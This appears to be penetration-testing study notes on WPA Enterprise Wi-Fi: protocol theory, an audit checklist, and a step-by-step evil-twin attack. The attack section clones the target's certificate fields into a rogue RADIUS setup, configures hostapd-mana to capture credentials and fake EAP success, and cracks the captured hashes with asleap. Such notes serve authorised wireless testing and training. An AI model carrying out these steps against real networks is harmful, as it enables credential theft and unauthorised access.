WPA Enterprise

WPA Enterprise Theory

WPA Enterprise, also known as WPA2 Enterprise, is a Wi-Fi security protocol that provides strong authentication and encryption for wireless networks. Unlike WPA-PSK, which uses a pre-shared key, WPA Enterprise requires a separate authentication server to verify the identity of each user before granting network access.

Here is a high-level overview of how WPA Enterprise works:

  1. The client device sends a request to join the network and provides its credentials, such as a username and password.
  2. The access point sends a request to the authentication server, asking it to verify the client's credentials.
  3. The authentication server uses a security protocol such as RADIUS (Remote Authentication Dial-In User Service) to verify the client's identity.
  4. If the client's credentials are correct, the authentication server sends a message to the access point granting network access.
  5. The client and access point use the WPA2 encryption protocol to create a secure connection and encrypt all data transmitted over the network.

WPA Enterprise provides several advantages over WPA-PSK, including more secure authentication and encryption, and the ability to manage user access more effectively. With WPA Enterprise, each user has a unique set of credentials, and their activity can be logged and tracked, making it easier to manage and secure the network.

To set up a WPA Enterprise network, you will need an authentication server, such as a RADIUS server, and appropriate client software installed on each client device. The authentication server must be configured with the appropriate security protocols and user account information. Once the network is set up, users will be required to enter their credentials to connect to the network, and their identity will be verified by the authentication server before network access is granted.

WPA Enterprise Checklist

Tunnel type: ⦁ EAP-TLS: Strongest but hard to implement, server + clients certs (hard to manage due to client certs) ⦁ EAP-TTLS: Second best with PEAP, use server certificates ⦁ PEAP: Second best with EAP-TTLS, used MSCHAPv2 ⦁ LEAP: Weak, MSCHAPv1 challenge/response protocol, can be cracked with wordlist (Cisco recommends EAP-FAST using MSCHAPv2) ⦁ EAP-MD5: Weak, challenge/response protocol, can be cracked with wordlist

Inner authentication type (strongest to weakest): ⦁ MSCHAPv2 ⦁ MSCHAPv1 (Requires MD4 hash of password to validate challenge/response ⦁ CHAP (Requires plaintext password to validate challenge/response ⦁ PAP (Plaintext username/password sent) ⦁ Server certificates used? ⦁ Verified by client? ⦁ Client certificates used? ⦁ Verified by server?

⦁ Unique certificate for each server/client or the same? ⦁ Client certificates can be exported? ⦁ Client displays error message of wrong certificate or no error? ⦁ User can ignore errors or accept self-signed certificate ⦁ Hostname configured to connect to -> Connect to these servers (else attacker can buy cert at the listed allowed CA's) ⦁ PEAP settings have enabled automatic usage of Windows credentials? ⦁ Enumerate users by sniffing EAP Identity packets or by brute forcing (e.g. domain username == e-mail username) ⦁ RADIUS: Weak shared secret (character count at least 22, uppercase/lowercase/numbers/special characters, common wordlist)? ⦁ Enumerate access point EAP configuration ⦁ Client has predefined Wireless Profile for the particular SSID? ⦁ If PEAP is used; Identity Protection is enabled in EAP configuration of the client (Windows 7 / 2008 R2)? (to prevent identity plain text leak in traffic) ⦁ Phish (WiFi) credentials by setting up an open access point with the same name and deauthenticating clients. You can use a captive portal for creds.

WPA Enterprise Practical

Step 1: Set your wireless interface in monitoring mode (in this case wlan0)

sudo airodump-ng wlan0

Note down: channel, BSSID, ESSID AUTH: MGT = Enterprise

Step 2:

  • Capture packets with wireshark/tcpdump
  • Deauth a client

Step 3:

sudo airmon-ng stop wlan0

Step 4:

  • Search in wireshark for tls.handshake.certificate or tls.handshake.type == 11
  • Packet Details pane, open Extensible Authentication Protocol > Transport Layer Security. Open the TLSv1 Record Layer: Handshake Protocol: Certificate
  • expand Handshake Protocol: Certificate item, then Certificates (plural). Inside Certificates, we can see one or more entries named Certificate. Each of them will be preceded by the length
  • For each certificate, we right click and select Export Packet Bytes to save the data into a file with a .der extension.

Step 5:

openssl x509 -inform der -in CERTIFICATE_FILENAME -text
openssl x509 -inform der -in CERTIFICATE_FILENAME -outform pem -out OUTPUT_PEM.crt.

Step 6:

  • Switch to root user and edit the [certificate_authority] fields to match our target CA certificate to appear less suspicious to clients in case they inspect the certificate.
sudo -s
cd /etc/freeradius/3.0/certs
nano ca.cnf

Step 7:

  • Edit the [server] fields to match our target server certificate.
nano server.cnf

Step 8:

  • (re)generate the certificate
rm dh
make

# if needed
make destroycerts

Step 9:

  • create the hostapd-mana configuration file, /etc/hostapd-mana/mana.conf
# SSID of the AP
ssid=<target-ssid>

# Network interface to use and driver type
# We must ensure the interface lists 'AP' in 'Supported interface modes' when running 'iw phy PHYX info'
interface=wlan0
driver=nl80211

# Channel and mode
# Make sure the channel is allowed with 'iw phy PHYX info' ('Frequencies' field - there can be more than one)
channel=1
# Refer to https://w1.fi/cgit/hostap/plain/hostapd/hostapd.conf to set up 802.11n/ac/ax
hw_mode=g

# Setting up hostapd as an EAP server
ieee8021x=1
eap_server=1

# Key workaround for Win XP
eapol_key_index_workaround=0

# EAP user file we created earlier
eap_user_file=/etc/hostapd-mana/mana.eap_user

# Certificate paths created earlier
ca_cert=/etc/freeradius/3.0/certs/ca.pem
server_cert=/etc/freeradius/3.0/certs/server.pem
private_key=/etc/freeradius/3.0/certs/server.key
# The password is actually 'whatever'
private_key_passwd=whatever
dh_file=/etc/freeradius/3.0/certs/dh

# Open authentication
auth_algs=1
# WPA/WPA2
wpa=3
# WPA Enterprise
wpa_key_mgmt=WPA-EAP
# Allow CCMP and TKIP
# Note: iOS warns when network has TKIP (or WEP)
wpa_pairwise=CCMP TKIP

# Enable Mana WPE
mana_wpe=1

# Store credentials in that file
mana_credout=/tmp/hostapd.credout

# Send EAP success, so the client thinks it's connected
mana_eapsuccess=1

# EAP TLS MitM
mana_eaptls=1

Step 10:

  • create the EAP user file referenced in the configuration file, /etc/hostapd-mana/mana.eap_user
*     PEAP,TTLS,TLS,FAST
"t"   TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2    "pass"   [2]
  • The first column indicates a specific user by username or, in the event of wildcard character (*), any user. It can contain a domain name as well.
  • The second column contains the protocols allowed for the specific users and authentication phase.
  • The third one is optional and is used for the password when a specific user is mentioned.
  • The fourth one, indicated here with [2], indicates that the settings on this line are for phase 2 authentication.

Step 11:

sudo hostapd-mana /etc/hostapd-mana/mana.conf

Step 12:

/tmp/hostapd.credout
asleap -C ce:b6:98:85:c6:56:59:0c -R 72:79:f6:5a:a4:98:70:f4:58:22:c8:9d:cb:dd:73:c1:b8:9d:37:78:44:ca:ea:d4 -W /usr/share/john/password.lst